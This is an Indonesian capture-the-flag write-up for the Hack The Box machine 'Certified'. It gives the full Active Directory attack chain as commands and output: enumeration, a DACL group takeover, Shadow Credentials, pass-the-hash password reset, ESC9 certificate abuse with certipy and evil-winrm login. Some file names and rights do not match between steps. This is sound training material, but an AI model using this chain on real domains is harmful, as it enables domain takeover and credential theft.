Halo semuanya! Disini gw akan kembali membahas salah satu mesin yang ada di Hack The Box yaitu Certified. Mesin ini adalah mesin Active Directory yang fokus pada eksploitasi sertifikat dan privilege escalation menggunakan ESC9 (Certificate Service Vulnerability).
Scanning Awal
Seperti biasa, kita akan mulai dengan melakukan scanning pada target dengan menggunakan nmap:
└─# nmap -sCV -Pn 10.10.11.41 -T5
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-22 09:38 EST
Nmap scan report for 10.10.11.41
Host is up (0.43s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-02-22 21:21:48Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-02-22T21:23:09+00:00; +6h42m42s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after: 2025-05-13T15:49:36
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Dari hasil scanning, kita dapat melihat bahwa target adalah domain controller dengan port-port standar Active Directory seperti LDAP (389/636), Kerberos (88), SMB (445), dan WinRM (5985).
Informasi tambahan:
- Domain: certified.htb
- Hostname: DC01.certified.htb
Enumerasi User
Kita diberikan kredensial awal untuk user judith.mader. Mari kita gunakan untuk melakukan enumerasi pengguna domain:
└─# rpcclient -U "certified.htb/judith.mader%judith09" 10.10.11.41 -c "enumdomusers"
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[judith.mader] rid:[0x44f]
user:[management_svc] rid:[0x451]
user:[ca_operator] rid:[0x452]
user:[alexander.huges] rid:[0x641]
user:[harry.wilson] rid:[0x642]
user:[gregory.cameron] rid:[0x643]
Kita juga dapat menggunakan netexec untuk melakukan RID bruteforce dan mendapatkan informasi lebih lengkap:
└─# netexec smb 10.10.11.41 -u 'judith.mader' -p 'judith09' --rid-brute
Output dari RID bruteforce menunjukkan grup dan pengguna yang tersedia di domain.
Analisis BloodHound
Mari kita gunakan BloodHound untuk memetakan domain dan mencari jalur penyerangan potensial:
└─# echo "10.10.11.41 certified.htb" >> /etc/hosts
└─# netexec ldap certified.htb -u judith.mader -p judith09 --bloodhound --collection All --dns-server 10.10.11.41
Setelah menganalisis data BloodHound, kita menemukan:
- User judith.mader memiliki hak WriteOwner terhadap grup Management
- Grup Management memiliki hak GenericWrite terhadap user management_svc
- User management_svc memiliki hak GenericAll terhadap user ca_operator
Attack Path 1: Mengambil Alih Management Group
1. Menetapkan judith.mader sebagai Owner
└─# bloodyAD --host "10.10.11.41" -d "certified.htb" -u "judith.mader" -p "judith09" set owner Management judith.mader
[!] S-1-5-21-729746778-2675978091-3820388244-1103 is already the owner, no modification will be made
2. Memberikan Hak WriteMembers kepada judith.mader
└─# impacket-dacledit -action write -rights 'WriteMembers' -principal 'judith.mader' -target-dn 'CN=Management,CN=Users,DC=certified,DC=HTB' 'certified.htb/judith.mader':'judith09'
[*] DACL backed up to dacledit-20250222-103721.bak
[*] DACL modified successfully!
3. Menambahkan judith.mader ke Grup Management
└─# net rpc group addmem "Management" "judith.mader" -U "certified.htb/judith.mader%judith09" -S "10.10.11.41"
4. Verifikasi Keanggotaan Grup
└─# net rpc group members "Management" -U "certified.htb/judith.mader%judith09" -S "10.10.11.41"
CERTIFIED\judith.mader
CERTIFIED\management_svc
CERTIFIED\Test$
Attack Path 2: Shadow Credentials Attack
Sekarang kita bisa melakukan Shadow Credentials Attack terhadap user management_svc, karena kita adalah anggota grup Management yang memiliki GenericWrite terhadap management_svc.
1. Tambahkan msDs-KeyCredentialLink pada management_svc
└─# python3 pywhisker/pywhisker.py -d "certified.htb" -u "judith.mader" -p 'judith09' --target "management_svc" --action "add"
[*] Searching for the target account
[*] Target user found: CN=management service,CN=Users,DC=certified,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: a155f35c-11c9-8dc2-87ec-b65f28365203
[*] Updating the msDS-KeyCredentialLink attribute of management_svc
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[*] Converting PEM -> PFX with cryptography: Rk6qrLju.pfx
[+] PFX exportiert nach: Rk6qrLju.pfx
[i] Passwort für PFX: Iobyev3Vtx29CY7SqWk5
2. Sinkronisasi Waktu dengan Domain Controller
Karena ada masalah clock skew, kita perlu menyesuaikan waktu:
└─# timedatectl set-ntp off
└─# rdate -n 10.10.11.41
3. Mendapatkan TGT untuk management_svc
└─# python3 gettgtpkinit.py certified.htb/management_svc -cert-pfx b3Ci3fP7.pfx -pfx-pass 'pU41RGBXoNM0IZNKJL1R' management_svc.ccache
2025-02-22 17:53:06,599 minikerberos INFO Loading certificate and key from file
2025-02-22 17:53:06,622 minikerberos INFO Requesting TGT
2025-02-22 17:53:06,873 minikerberos INFO AS-REP encryption key (you might need this later):
2025-02-22 17:53:06,873 minikerberos INFO 29f71e40fd42505ead7209b01b34fe5de018358f1dd3ff7b90cb9718217e1626
4. Menggunakan TGT untuk Mendapatkan NT Hash
└─# export KRB5CCNAME=management_svc.ccache
└─# python3 getnthash.py certified.htb/management_svc -key 29f71e40fd42505ead7209b01b34fe5de018358f1dd3ff7b90cb9718217e1626
[*] Using TGT from cache
[*] Requesting ticket to self with PAC
Recovered NT Hash
a091c183....<management_svc hash>
Attack Path 3: Mengambil Alih ca_operator
Dari BloodHound, kita melihat bahwa management_svc memiliki hak GenericAll terhadap ca_operator. Mari kita manfaatkan untuk mengubah passwordnya:
└─# pth-net rpc password "ca_operator" "pass1234" -U "certified.htb"/"management_svc"%"<management_svc hash>":"<management_svc hash>" -S "10.10.11.41"
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...
Verifikasi bahwa password telah berhasil diubah:
└─# netexec smb 10.10.11.41 -u 'ca_operator' -p 'pass1234'
SMB 10.10.11.41 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.41 445 DC01 [+] certified.htb\ca_operator:pass1234
Eksploitasi ESC9 (Certificate Template Abuse)
1. Analisis Template Sertifikat
Mari kita gunakan Certipy untuk menemukan template sertifikat yang ada:
└─# certipy find -u judith.mader@certified.htb -p judith09 -dc-ip 10.10.11.41
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
Dari output JSON, kita menemukan bahwa template sertifikat “CertifiedAuthentication” memiliki flag “NoSecurityExtension” yang memungkinkan kita melakukan ESC9.
2. Perubahan UPN (User Principal Name) ca_operator
Pertama, kita periksa UPN saat ini:
└─# ldapsearch -x -H ldap://10.10.11.41 -D "judith.mader@certified.htb" -w "judith09" -b "DC=certified,DC=htb" "(sAMAccountName=ca_operator)" userPrincipalName
# operator ca, Users, certified.htb
dn: CN=operator ca,CN=Users,DC=certified,DC=htb
userPrincipalName: ca_operator@certified.htb
Sekarang kita modifikasi UPN ca_operator menjadi Administrator:
└─# certipy account update -username management_svc@10.10.11.41 -hashes <management_svc hash> -user ca_operator -upn Administrator -debug
[*] Updating user 'ca_operator':
userPrincipalName : Administrator
[*] Successfully updated 'ca_operator'
3. Meminta Sertifikat sebagai Administrator
└─# certipy req -username ca_operator@10.10.11.41 -p pass1234 -ca certified-DC01-CA -template CertifiedAuthentication -debug
[+] Generating RSA key
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 20
[*] Got certificate with UPN 'Administrator'
[*] Saved certificate and private key to 'administrator.pfx
4. Authenticate dengan Sertifikat Administrator
└─# certipy-ad auth -pfx administrator.pfx -domain certified.htb
[*] Using principal: administrator@certified.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@certified.htb': aad3b435b51404eeaad3b435b51404ee:0d5b49608b<adminhash>
Mendapatkan Flag
Sekarang kita dapat menggunakan hash administrator untuk login via WinRM dan mendapatkan flag:
└─# evil-winrm -i certified.htb -u administrator -H "adminhash"
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
02c04e8f7d90cbb4bfd20866b7b7bae5
*Evil-WinRM* PS C:\Users\management_svc\Desktop> cat user.txt
8b0fc979572a3ff126f975f91120a282
Kesimpulan
Mesin Certified memperlihatkan beberapa teknik serangan Active Directory yang umum:
- WriteOwner Group Takeover – Mengambil kendali grup Management dengan memanfaatkan hak WriteOwner
- Shadow Credentials Attack – Mendapatkan kredensial management_svc tanpa mengubah password
- ESC9 (Certificate Template Abuse) – Menggunakan template sertifikat yang rentan untuk mendapatkan akses sebagai Administrator
Attack Path Summary
judith.mader (WriteOwner) → Management Group → management_svc (GenericAll) → ca_operator → ESC9 → Administrator